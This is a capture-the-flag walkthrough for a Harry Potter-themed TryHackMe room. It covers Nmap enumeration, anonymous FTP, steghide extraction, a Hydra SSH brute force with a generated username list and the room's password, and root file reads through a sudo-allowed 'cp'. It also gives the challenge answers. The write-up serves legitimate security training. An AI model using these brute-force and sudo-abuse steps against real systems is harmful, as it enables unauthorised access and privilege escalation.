Harry Potter – CTF Walkthrough

This is the official write-up for the Harry Potter CTF room on TryHackMe; it walks through the whole process step by step.

Publish Date

July 25, 2023

CTF Walkthrough

Hello there, and welcome to the official write-up of Harry Potter – CTF. I created this room for fun, and it took only a few hours to build. If anyone is interested in knowing how to create a TryHackMe room, please leave a comment. I am using Kali Linux for this walkthrough. If you have trouble understanding any Linux command, check out Explain Shell.

Enumeration

Start the machine by clicking the green “Start Machine” button and wait until the IP address appears.

Next, run an Nmap scan against that IP address. If you are unfamiliar with Nmap, check out “Nmap Tutorial to find Network Vulnerabilities“. The syntax is:

nmap -A ipaddress

The -A option turns on OS detection, version detection, the default NSE scripts and traceroute in one go, which is why the output also contains service banners and, for FTP, the anonymous-login check and directory listing used in the next section.

The scan shows only a few services: FTP, SSH and an HTTP web server. The service banners also give away the operating system, which appears to be Ubuntu.
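The scan step in script form, as an added example that is not part of the original write-up: it runs Nmap with a greppable log next to the human-readable one and boils that log down to one line per open port, which is easier to reuse in later steps than the full -A output. The target name ipaddress is the placeholder used throughout this page, and the sample scan output inside the block is constructed for an offline dry run, not the room's real output.

```shell
#!/bin/sh
# Added example (not from the original write-up). Runs the scan with a greppable
# log next to the human-readable one and reduces it to "port/proto service version"
# lines. "ipaddress" is the room's target, as elsewhere on this page.

scan_host() {
    # -A: OS detection, version detection, default scripts and traceroute
    # -oN: readable log, -oG: greppable log that the parser below reads
    nmap -A -oN scan.nmap -oG scan.gnmap "$1" >/dev/null
    open_ports < scan.gnmap
}

# Parse a .gnmap stream on stdin. Each host line carries a tab-separated
# "Ports:" field whose entries are comma-separated and look like
# "port/state/proto/owner/service/rpcinfo/version/".
open_ports() {
    awk -F'\t' '
        /Ports:/ {
            ports = ""
            for (i = 1; i <= NF; i++)
                if (index($i, "Ports: ") == 1) ports = substr($i, 8)
            n = split(ports, entry, /, */)
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] == "open")
                    printf "%s/%s %s %s\n", f[1], f[3], f[5], f[7]
            }
        }'
}

# Constructed sample in .gnmap format (services and versions are made up for
# the dry run, not copied from the room) so the parser can be exercised offline.
sample_gnmap() {
    printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, '
    printf '22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu/, '
    printf '80/open/tcp//http//nginx 1.18.0 (Ubuntu)/, '
    printf '443/closed/tcp//https///\tIgnored State: closed (996)\tOS: Linux\n'
}

if [ $# -ge 1 ]; then
    scan_host "$1"          # ./enum.sh ipaddress
else
    sample_gnmap | open_ports   # offline dry run on the constructed sample
fi
```

Run with the target IP to scan for real; run with no arguments and it prints the three open ports from the constructed sample, one per line. The closed 443 entry is filtered out by the state check, so only services worth following up appear.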

FTP Server

The scan output also shows that the host allows anonymous FTP login without a password, and that the FTP directory contains a file named “resurrection_stone.flag“. To connect to the FTP service, run:

ftp ipaddress

Once connected, the FTP service prompts for a name; enter “anonymous” and press Enter at the password prompt, since none is required.

Now use the “ls” command to list the FTP directory’s contents. The file “resurrection_stone.flag” is there; download it with:

get resurrection_stone.flag

Type “quit” to exit the FTP service.

Now, look at the content of the file by using the following command.

cat resurrection_stone.flag

Hurray! We have our first flag. Since we do not have SSH credentials yet, the next place to look is the web server, which the scan already identified as Nginx.

Webserver

We are greeted with a welcome page from Hogwarts, and the paragraph text contains a clue: it asks for a spell. Let’s see whether the page source holds anything.

The source contains the comment “<!-- use the unlocking charm -->”. A quick Google search shows that the unlocking charm in Harry Potter is “Alohomora”, so let’s try that as a path on the web server.

There is indeed a page at “alohomora” with a quiz-like form. If you are a Harry Potter fan, answer the questions (and otherwise, Google is your friend).

Once the questions are answered, we are given a URL that points to an image (.jpg). Download it with wget:

wget url

Steganography

Start by looking at the image’s metadata, since image metadata is the usual place for a steganography challenge to leave its hint. View it with:

exiftool golden_egg.jpg

Close inspection gives two findings: the Description field holds the phrase “I solemnly swear I am up to no good.” and the Comment field says “lowercase and underscore.” A quick search for “I solemnly swear I am up to no good harry potter” leads to a name, the “Marauder’s Map”.

So we have a name and a hint to write it in lowercase with an underscore, which gives the passphrase “marauders_map”. Now we can check the image for hidden data with steghide, passing that passphrase with -p (without -p, steghide prompts for it):

steghide extract -sf golden_egg.jpg -p marauders_map

Extracting the hidden file from golden_egg.jpg yields an unsigned note; read it with the “cat” command.

The note contains a password. Since SSH is running on the host, the password is most likely for SSH. We still need a username, and from the wording of the message (if you are not a Harry Potter fan, Google it) we can tell that Albus Dumbledore left it.

Brute-Force Attack

We have a password but no confirmed username, so we will use Hydra to try that password against a list of candidate usernames. If you are unfamiliar with Hydra, check out the OffSec Services documentation.

First, create a username wordlist from different combinations of Dumbledore’s name. A wordlist generator makes this quick: the website Weakpass can produce a set of possible usernames from the information we have.

Copy all the candidate usernames into a text file named “username.txt” and run Hydra against the host with the command below. To learn more about password cracking, check out How to Crack a Password by Guru99.

hydra -L username.txt -p h0gwArts1sAmAg1cAlplAce -t 4 ipaddress ssh

“-L” takes the username wordlist (capital L means a file; lowercase -l would be a single name), lowercase “-p” passes the single password we possess (capital -P would be a password list), then comes the target IP address, and at the end the service we want to attack. “-t 4” limits Hydra to four parallel connections, because most SSH daemons refuse connections beyond a small number and Hydra itself warns you to lower the task count for ssh. Since there is one known password and only a handful of candidate names, this is really username enumeration rather than password cracking. If this is still unclear, head to Linux for Devices to learn more about SSH brute-forcing with Hydra.
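The same wordlist can be built offline, without a website, from the two halves of the name. The following is an added example and not the author’s method or any tool’s output: it takes a first and last name, emits the combinations usually tried for Linux usernames (bare names, initial plus surname, the two parts joined with nothing, a dot, an underscore or a hyphen), removes duplicates and leaves the result ready for hydra -L. The name pair is the one the room points at; the set of naming conventions is an assumption about what is common, not something the room states.

```shell
#!/bin/sh
# Added example, not part of the original write-up: generate candidate SSH
# usernames from a first and last name, for use with hydra -L.
# The naming patterns are an assumption about common conventions.
# Usage: ./usernames.sh Albus Dumbledore > username.txt

gen_usernames() {
    first=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    last=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
    finit=$(printf '%s' "$first" | cut -c1)    # first initial
    linit=$(printf '%s' "$last" | cut -c1)     # last initial
    {
        # bare names first: on small boxes the surname alone is the usual hit
        printf '%s\n' "$last" "$first"
        # joined forms with the separators most naming schemes use
        for sep in '' '.' '_' '-'; do
            printf '%s\n' \
                "$first$sep$last" "$last$sep$first" \
                "$finit$sep$last" "$last$sep$finit" \
                "$first$sep$linit"
        done
    } | awk '!seen[$0]++'     # drop duplicates, keep first-seen order
}

# Number of candidates, i.e. how many login attempts Hydra will make with -p.
count_usernames() {
    gen_usernames "$1" "$2" | wc -l | tr -d ' '
}

if [ $# -ge 2 ]; then
    gen_usernames "$1" "$2"
fi
```

Feed the output to Hydra as before: hydra -L username.txt -p h0gwArts1sAmAg1cAlplAce -t 4 ipaddress ssh. With 22 candidates and one password this is 22 login attempts, small enough to stay under typical SSH connection limits but still visible as a burst of failed logins in the target’s auth log.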

Hydra reports a valid username for our password, so we can log in with those credentials:

ssh dumbledore@ipaddress

If you have never used SSH before, read How to Use SSH to Connect to a Remote Server in Linux or Windows by phoenixNAP.

Privilege Escalation

The home directory contains “invisibility_cloak.flag”. Hurray! That is another flag, leaving one to go. Looking around the file system, the last flag sits in the Voldemort directory, but trying to read it gives a permission error.

Trying an arbitrary sudo command fails, so we do not have blanket sudo rights. Still, a user can be allowed to run specific commands as root, and sudo -l lists exactly which ones apply to us:

sudo -l

The output shows that we may run the copy command “cp” via sudo, so let’s see what “cp” can do for us when it runs as root.

The commands below read the flag: because cp runs as root it can open any file, and copying that file to /dev/stdout writes its contents straight to our terminal.

LFILE=file_to_read
sudo cp "$LFILE" /dev/stdout

Note that a root cp can overwrite files just as easily as it reads them, so allowing cp through sudo is effectively handing out root; reading the flag is simply all this room asks for.

Voila! We have accessed the final flag too.

Questions & Answers

  1. What’s the name of the spell?
  2. What’s the secret phrase to unlocking the golden egg?
  3. Invisibility cloak
  4. Resurrection Stone
  5. Elder Wand

All five answers appear in the steps above: the spell and the secret phrase in the Webserver and Steganography sections, and the three flags in the FTP, SSH and Privilege Escalation sections.

Conclusion

So far we have worked with the FTP, SSH and HTTP services. We also used Steghide and Hydra and saw how they work and what they are used for: hiding files inside images and brute-forcing network services. If you have enjoyed my writing, please subscribe to my blog.

Rahul Setrakian

@rahulsetrakian

I am a passionate and driven learner with diverse skills, seeking impactful collaborations.
